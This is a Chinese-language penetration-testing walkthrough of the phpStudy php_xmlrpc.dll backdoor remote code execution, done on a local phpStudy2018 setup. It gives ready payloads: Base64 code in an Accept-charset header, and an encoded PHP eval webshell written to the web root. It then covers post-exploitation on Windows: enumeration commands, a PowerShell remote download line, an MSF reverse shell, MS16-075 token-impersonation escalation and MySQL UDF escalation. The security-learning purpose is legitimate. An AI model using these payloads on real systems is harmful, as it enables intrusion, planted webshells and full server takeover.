关于一次真实的渗透测试案例之phpstudy_rce

0x01 漏洞简介

2019年9月20日，网上传出 phpStudy 软件存在后门，随后作者立即发布声明进行澄清，其真实情况是该软件官网于2016年被非法入侵，程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门，经过分析除了有反向连接木马之外，还可以正向执行任意php代码。

0x02影响版本

版本
phpStudy2016-php-5.2.17 -- phpStudy2016-php-5.4.45
phpStudy2018-php-5.2.17 -- phpStudy2018-php-5.4.45
具体需要根据 php_xmlrpc.dll模块是否植入后门代码

0x03环境

• phpStudy2018-php-5.2.17

  [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DwuhDeaI-1677680942365)(D:\学习\笔记\tp\phpstudy\phpinfo.png)]

  0x04漏洞检测

  phpStudy2016路径:
  php\php-5.2.17\ext\php_xmlrpc.dll
  php\php-5.4.45\ext\php_xmlrpc.dll
  
  phpStudy2018路径:
  PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
  PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
  
  查看是否存在后门代码:
  '@eval'
  

  

0x05漏洞测试

payload:
# 将要执行的代码进行Base64编码，例如：system('whoami');
Accept-charset: c3lzdGVtKCd3aG9hbWknKTs=
# 注意删除gzip,deflate之间的空格，否则不生效
Accept-Encoding: gzip,deflate  

0x06写入webshell

#webshell - 在创建对象时，调用析构函数，执行代码
<?php class C01 { public function __construct($sec){ @eval("/*ZG5zknRfSk*/".$sec.""); }}new C01($_REQUEST['cmd']);?> //进行base64加密
#payload
$b="PD9waHAgY2xhc3MgQzAxIHsgcHVibGljIGZ1bmN0aW9uIF9fY29uc3RydWN0KCRzZWMpeyBAZXZhbCgiLypaRzV6a25SZlNrKi8iLiRzZWMuIiIpOyB9fW5ldyBDMDEoJF9SRVFVRVNUWydjbWQnXSk7Pz4=";
$a=base64_decode($b);
fputs(fopen('C:\phpStudy-shell\PHPTutorial\WWW\1.php ','w'),$a);
#base64
JGI9IlBEOXdhSEFnWTJ4aGMzTWdRekF4SUhzZ2NIVmliR2xqSUdaMWJtTjBhVzl1SUY5ZlkyOXVjM1J5ZFdOMEtDUnpaV01wZXlCQVpYWmhiQ2dpTHlwYVJ6VjZhMjVTWmxOcktpOGlMaVJ6WldNdUlpSXBPeUI5Zlc1bGR5QkRNREVvSkY5U1JWRlZSVk5VV3lkamJXUW5YU2s3UHo0PSI7CiRhPWJhc2U2NF9kZWNvZGUoJGIpOwpmcHV0cyhmb3BlbignQzpccGhwU3R1ZHktc2hlbGxcUEhQVHV0b3JpYWxcV1dXXDEucGhwICcsJ3cnKSwkYSk7
#查看文件是否存在
system('dir C:\phpStudy-shell\PHPTutorial\WWW\  /w/o/s/p');
c3lzdGVtKCdkaXIgQzpccGhwU3R1ZHktc2hlbGxcUEhQVHV0b3JpYWxcV1dXXCAgL3cvby9zL3AnKTs=
#查看文件内容是否完整
system('type  C:\phpStudy-shell\PHPTutorial\WWW\1.php');
c3lzdGVtKCd0eXBlICBDOlxwaHBTdHVkeS1zaGVsbFxQSFBUdXRvcmlhbFxXV1dcMS5waHAnKTs=
#菜刀连接

0x07上传大马

一句话木马作用有限，通过菜刀等工具上传php大马 - 为后续提权
后期使用大马进行提升权限 - 最终获取服务器权限 system/administrator权限

0x08权限提升

当进行某项操作访问被拒绝时 - 就需要进行提升当前会话权限
可以通过大马进行信息收集 - 补丁筛选 - 利用系统溢出漏洞提权(MSF/特定EXP)
或者通过探针数据库类型 - 信息收集(root用户密码) - 利用特定数据库提权方式进行提权

win系统权限解释

信息收集

进行信息收集 - 这里利用系统溢出漏洞 - 进行提升权限至system权限
信息收集：当前用户权限、systeminfo系统信息等等 - 如下图：

Win提权命令

#命令                       	描述
systeminfo  　　　　　　　　	打印系统信息
whoami      　　　　　　　　	获得当前用户名
whoami /priv    　　　　　	当前账户权限
ipconfig        　　　　　 	网络配置信息
ipconfig /displaydns        显示DNS缓存
route print                 打印出路由表
arp -a                      打印arp表
hostname                    主机名
net user                    列出用户
net user UserName           关于用户的信息
net user \SMBPATH Pa$$w0rd /u:UserName      连接SMB
net localgroup              列出所有组
net localgroup GROUP        关于指定组的信息
net view \127.0.0.1         会话打开到当前计算机
net session                 开发给其他机器
netsh firewall show config  显示防火墙配置
DRIVERQUERY             　　	列出安装的驱动
tasklist /svc               列出服务任务
net start                   列出启动的服务
dir /s foo                  在目录中搜索包含指定字符的项
dir /s foo == bar           同上
sc query                    列出所有服务
sc qc ServiceName           找到指定服务的路径
shutdown /r /t 0            立即重启
type file.txt               打印出内容
icacls "C:\Example"         列出权限
wmic qfe get Caption,Description,HotFixID,InstalledOn  列出已安装的补丁
(New-Object System.Net.WebClient) .DownloadFile("http://host/file"."C:\LocalPath")　利用ps远程下载文件到本地
accesschk.exe -qwsu "Group"         修改对象（尝试Everyone，Authenticated Users和/或Users）

systeminfo信息

在收集系统信息时 - 使用systeminfo命令 - 通常使用重定向打印至文件中 - 方便看/不至于乱码/无回显等情况

0x09补丁筛选

通过导出的systeminfo信息 - 拿去使用wes或其它项目进行筛选补丁

推荐项目

GitHub - chroblert/WindowsVulnScan

GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation

GitHub - vulmon/Vulmap: Vulmap Online Local Vulnerability Scanners Project

github.com

提权补丁信息对比 (shentoushi.top)

0x10生成反弹shell

利用MSF生成反弹shell - 获取一个session - 后期进行提权漏洞利用
也可以利用特定EXP - 直接利用漏洞 - 进行提权

0x11利用溢出漏洞提权

这时已经有了一个反弹shell会话 - 利用补丁筛选出的提权漏洞 - 进行提权 - system权限
#MSF也有自带补丁检测模块 
这里先利用enum_patches模块 收集补丁信息，然后查找可用的exploits进行提权
#检测提权模块
post/windows/gather/enum_patches
multi/recon/local_exploit_suggester
# 这个网站进行查找/或其它方式 - 相应系统版本 - 漏洞编号
https://www.shentoushi.top/av/kb.php

0x12利用特定EXP提权

windows-exploit-suggester的功能就如它的名字一样，当我们用它来探测某一个系统时，他会告诉我们该系统有哪些exploit可能可以利用。但是由于该工具先是假设一个系统存在所有的相关漏洞，然后根据补丁信息再去排除，所以就导致误报率会高一点，例如一台机器没有启用iis服务，但是可能该工具会误报存在IIS相关漏洞
可以尝试多个项目 - 得到准确的(result)结果
通过此款工具 - 进行搜索EXP 或 通过网络搜索漏洞编号 - 找到特定EXP

MS16-075 EXP提权

#利用GitHub下载ms16-075的exp提权
下载地址：https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075
#下载好后通过meterpreter进行上传
upload /home/hdh/potato.exe c:/ - 或使用大马进行上传
#然后执行如下命令：
use incognito：加载incoginto功能（用来盗窃目标主机的令牌或是假冒用户）
list_tokens -u：列出目标主机用户的可用令牌
#继续执行如下命令：
execute -CH -f c:/potato.exe 创建新的进程
list_tokens -u 列出目标主机的可用令牌
impersonate_token “NT AUTHORITY\SYSTEM” 假冒目标主机上的可用令牌
#查看当前用户
getuid

推荐EXP项目

SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合 (github.com)

0x13利用数据库提权

通过探针到数据库类型版本 - 收集到数据库信息密码 - Mysql UDF提权 - 利用数据库提升权限

#这里注意在利用MySQL - UDF提权时 - 分辨数据库版本 - 来判断dll文件导出在哪个目录
mysql<5.1 导出目录 c:/windows 或 system32
mysql=>5.1 导出到 安装目录/lib/plugin/ - 注意 mysql>5.1需要手工创建 plugin 目录或利用 NTFS 流创建

#换了一款暗月的mysql提权大马 - 报出"The MySQL server is running with the --secure-file-priv option so it cannot execute this statement" 错误
通过网上查询 - 发现是MySQL 对于导入导出的目录是有限制的，只允许指定的目录才能导入导出.此处变量值为 NULL，即没设置允许操作的目录，所以没法导出到文件。
#查看系统变量 secure_file_priv
show variables like '%secure%';
#设置导出目录路径
通过上传数据库配置文件 - my.ini - 覆盖原有配置文件 - 重启数据库服务(具体方法自己想)

这里还是用的暗月的mysql提权脚本，上面一款有时候会出现先问题，可能因为本地环境问题